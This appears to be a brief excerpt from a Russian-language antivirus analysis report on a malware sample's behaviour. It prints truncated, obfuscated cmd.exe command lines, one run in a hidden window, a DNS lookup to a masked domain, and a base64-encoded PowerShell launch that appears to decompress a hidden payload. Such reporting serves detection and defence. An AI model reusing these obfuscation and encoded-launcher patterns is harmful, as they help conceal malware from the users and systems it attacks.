Техническая информация
- '<SYSTEM32>\cmd.exe' YbGmunW YXfvSbkiGpacFHOrOnDzO LbTnFXwEGazqV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cOMJOrFNsswQWsv%=zSwKiUUwniK&&set %kINfTioEPF%=p&&set %zHcfBrlZP%=o^w&...
- DNS ASK gq###e1z2x1.com
- '<SYSTEM32>\cmd.exe' YbGmunW YXfvSbkiGpacFHOrOnDzO LbTnFXwEGazqV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cOMJOrFNsswQWsv%=zSwKiUUwniK&&set %kINfTioEPF%=p&&set %zHcfBrlZP%=o^w&...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4ARQB3AC0ATwBCAEoARQBDAFQAIABTAFkAcwBUAGUAbQAuAEkAbwAuAHMAdAByAEUAYQBtAFIAZQBBAGQARQBSACgAKABuAEUAdwAtAE8AQgBKAEUAQwBUACAAaQBPAC4AYwBPAE0AcAByAGUAUwBTAGkATwBOAC4AZABFAEYAbABBAHQAZQBzAF...